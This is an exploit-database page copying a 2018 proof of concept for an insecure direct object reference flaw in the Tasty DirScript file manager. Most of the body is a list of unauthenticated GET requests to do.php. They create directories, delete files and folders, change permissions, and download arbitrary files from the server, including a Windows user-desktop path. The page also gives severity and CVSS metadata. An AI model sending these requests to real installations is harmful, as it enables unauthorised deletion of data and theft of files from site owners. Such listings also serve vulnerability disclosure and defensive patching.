Advertisement






Tasty DirScript All Version Insecure Direct Object Refrences vulnerability

CVE Category Price Severity
N/A CWE-284 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2018-08-10
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02196 0.49976

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018080072

Below is a copy:

Tasty DirScript All Version Insecure Direct Object Refrences vulnerability
[+] Exploit Title ; Tasty DirScript All Version Insecure Direct Object Refrences vulnerability

[+] Date : 2018-08-10

[+] Author : Work LearninG

[+] Vendor Homepage : http://www.p30script.ir/1257-%D8%AF%D8%A7%D9%86%D9%84%D9%88%D8%AF-%D8%A7%D8%B3%DA%A9%D8%B1%DB%8C%D9%BE%D8%AA-%D9%81%D8%A7%DB%8C%D9%84-%D9%85%D9%86%DB%8C%D8%AC%D8%B1-tastydir.html

[+] Version : All Version

[+] Dork : N/A

[+] My Site : https://worklearning.ir

[+] Tested On : windows 10 - kali linux 2.0

[+] Contact : [email protected]

[+] Description :

[!] Tasty dir is file manager.
[+] Poc : 

[!] Mkdir : http://localhost/sc/_tastydir/do.php?mkdir=dir name

[!] deletefile : http://localhost/sc/_tastydir/do.php?delf=Your File Name

[!] Delete Folder : http://localhost/sc/_tastydir/do.php?delfld=Your Directory Name

[!] Chmod : http://localhost/sc/_tastydir/do.php?chmod=Your File Name

[!] Get File Size : http://localhost/sc/_tastydir/do.php?getsize=Your File Name

[!] Get Info : http://localhost/sc/_tastydir/do.php?getinfo=Your File Name

[!] Download File : http://localhost/sc/_tastydir/do.php?download=C:\Users/0P3N3R/Desktop/df.txt


[+] Security Level :

[!] High

[+] Exploitation Technique:

[!] remote

[+] Request Method :

[!] GET

[+] Vulnerability Link :

[*] http://localhost/sc/_tastydir/do.php?download=C:\Users/0P3N3R/Desktop/df.txt

[+] Vulnerable File :

[!] do.php


[+] We Are : [+] 0P3N3R [+] 

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.